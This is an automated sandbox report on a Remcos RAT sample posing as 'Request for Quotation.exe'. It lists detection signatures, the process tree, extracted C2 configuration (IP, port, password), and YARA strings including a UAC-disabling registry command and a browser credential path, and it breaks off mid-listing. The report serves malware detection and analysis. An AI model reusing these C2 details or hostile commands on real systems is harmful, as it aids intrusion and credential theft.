Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Request for Quotation.exe

Overview

General Information

Sample Name:Request for Quotation.exe
Analysis ID:356426
MD5:ae4bd6c5a7eaa50704d43d6054fc5dbd
SHA1:ab597cfc0433999f2032c56fe2c9e17081bcab46
SHA256:8e51354c8b2f461ab0cfb92409bc45bf4e06ae244080513e2d6224dc22f47771
Tags:RemcosRAT

Most interesting Screenshot:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara signature match

Classification

Startup

  • System is w10x64
  • Request for Quotation.exe (PID: 7164 cmdline: 'C:\Users\user\Desktop\Request for Quotation.exe' MD5: AE4BD6C5A7EAA50704D43D6054FC5DBD)
    • Request for Quotation.exe (PID: 612 cmdline: 'C:\Users\user\Desktop\Request for Quotation.exe' MD5: AE4BD6C5A7EAA50704D43D6054FC5DBD)
      • Request for Quotation.exe (PID: 6188 cmdline: 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\hbieekorpghvpuxbpehxjpq' MD5: AE4BD6C5A7EAA50704D43D6054FC5DBD)
      • Request for Quotation.exe (PID: 6424 cmdline: 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\rvowfdgtdozazitngptymckjrq' MD5: AE4BD6C5A7EAA50704D43D6054FC5DBD)
      • Request for Quotation.exe (PID: 5692 cmdline: 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\uptpyvrmrwrfbohrpagsxhxaawaqan' MD5: AE4BD6C5A7EAA50704D43D6054FC5DBD)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "103.89.88.238:4299:s%qDr", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "excel.exe", "Startup value": "excel", "Hide file": "Disable", "Mutex": "excel-8OHAVR", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmpRemcos_1Remcos Payloadkevoreilly
    • 0x16510:$name: Remcos
    • 0x16888:$name: Remcos
    • 0x16de0:$name: Remcos
    • 0x16e33:$name: Remcos
    • 0x15674:$time: %02i:%02i:%02i:%03i
    • 0x156fc:$time: %02i:%02i:%02i:%03i
    • 0x16be4:$time: %02i:%02i:%02i:%03i
    • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
    00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmpREMCOS_RAT_variantsunknownunknown
    • 0x166f8:$str_a1: C:\Windows\System32\cmd.exe
    • 0x16714:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x16714:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x15dfc:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x16400:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x159e0:$str_b2: Executing file:
    • 0x16798:$str_b3: GetDirectListeningPort
    • 0x16240:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x16534:$str_b5: licence_code.txt
    • 0x1649c:$str_b6: \restart.vbs
    • 0x163c0:$str_b8: \uninstall.vbs
    • 0x1596c:$str_b9: Downloaded file:
    • 0x15998:$str_b10: Downloading file:
    • 0x15690:$str_b11: KeepAlive Enabled! Timeout: %i seconds
    • 0x159fc:$str_b12: Failed to upload file:
    • 0x167d8:$str_b13: StartForward
    • 0x167bc:$str_b14: StopForward
    • 0x16330:$str_b15: fso.DeleteFile "
    • 0x16394:$str_b16: On Error Resume Next
    • 0x162fc:$str_b17: fso.DeleteFolder "
    • 0x15a14:$str_b18: Uploaded file:
    00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmpRemcos_1Remcos Payloadkevoreilly
      • 0x16510:$name: Remcos
      • 0x16888:$name: Remcos
      • 0x16de0:$name: Remcos
      • 0x16e33:$name: Remcos
      • 0x15674:$time: %02i:%02i:%02i:%03i
      • 0x156fc:$time: %02i:%02i:%02i:%03i
      • 0x16be4:$time: %02i:%02i:%02i:%03i
      • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
      Click to see the 7 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.1.Request for Quotation.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
        1.1.Request for Quotation.exe.400000.0.raw.unpackRemcos_1Remcos Payloadkevoreilly
        • 0x16510:$name: Remcos
        • 0x16888:$name: Remcos
        • 0x16de0:$name: Remcos
        • 0x16e33:$name: Remcos
        • 0x15674:$time: %02i:%02i:%02i:%03i
        • 0x156fc:$time: %02i:%02i:%02i:%03i
        • 0x16be4:$time: %02i:%02i:%02i:%03i
        • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
        1.1.Request for Quotation.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
        • 0x166f8:$str_a1: C:\Windows\System32\cmd.exe
        • 0x16714:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x16714:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x15dfc:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x16400:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x159e0:$str_b2: Executing file:
        • 0x16798:$str_b3: GetDirectListeningPort
        • 0x16240:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x16534:$str_b5: licence_code.txt
        • 0x1649c:$str_b6: \restart.vbs
        • 0x163c0:$str_b8: \uninstall.vbs
        • 0x1596c:$str_b9: Downloaded file:
        • 0x15998:$str_b10: Downloading file:
        • 0x15690:$str_b11: KeepAlive Enabled! Timeout: %i seconds
        • 0x159fc:$str_b12: Failed to upload file:
        • 0x167d8:$str_b13: StartForward
        • 0x167bc:$str_b14: StopForward
        • 0x16330:$str_b15: fso.DeleteFile "
        • 0x16394:$str_b16: On Error Resume Next
        • 0x162fc:$str_b17: fso.DeleteFolder "
        • 0x15a14:$str_b18: Uploaded file:
        1.1.Request for Quotation.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          1.1.Request for Quotation.exe.400000.0.unpackRemcos_1Remcos Payloadkevoreilly
          • 0x16510:$name: Remcos
          • 0x16888:$name: Remcos
          • 0x16de0:$name: Remcos
          • 0x16e33:$name: Remcos
          • 0x15674:$time: %02i:%02i:%02i:%03i
          • 0x156fc:$time: %02i:%02i:%02i:%03i
          • 0x16be4:$time: %02i:%02i:%02i:%03i
          • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 1.1.Request for Quotation.exe.400000.0.unpackMalware Configuration Extractor: Remcos {"Host:Port:Password": "103.89.88.238:4299:s%qDr", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "excel.exe", "Startup value": "excel", "Hide file": "Disable", "Mutex": "excel-8OHAVR", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0"}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Request for Quotation.exeVirustotal: Detection: 27%Perma Link
          Source: Request for Quotation.exeReversingLabs: Detection: 21%
          Yara detected Remcos RATShow sources
          Source: Yara matchFile source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Request for Quotation.exe PID: 7164, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Request for Quotation.exe PID: 612, type: MEMORY
          Source: Yara matchFile source: 1.1.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Request for Quotation.exe.2a50000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Request for Quotation.exe.2a50000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Request for Quotation.exeJoe Sandbox ML: detected
          Source: 1.1.Request for Quotation.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
          Source: 0.2.Request for Quotation.exe.2a50000.5.unpackAvira: Label: BDS/Backdoor.Gen
          Source: 1.2.Request for Quotation.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,3_2_00404423

          Compliance:

          barindex
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\Request for Quotation.exeUnpacked PE file: 1.2.Request for Quotation.exe.400000.0.unpack
          Uses 32bit PE filesShow sources
          Source: Request for Quotation.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: Request for Quotation.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: wntdll.pdbUGP source: Request for Quotation.exe, 00000000.00000003.638506500.0000000002A70000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Request for Quotation.exe, 00000000.00000003.638506500.0000000002A70000.00000004.00000001.sdmp
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A15
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_004065C1 FindFirstFileA,FindClose,0_2_004065C1
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_2_00404C0A
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_2_0040751B
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr1_2_00410586
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_2_0040728F
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscm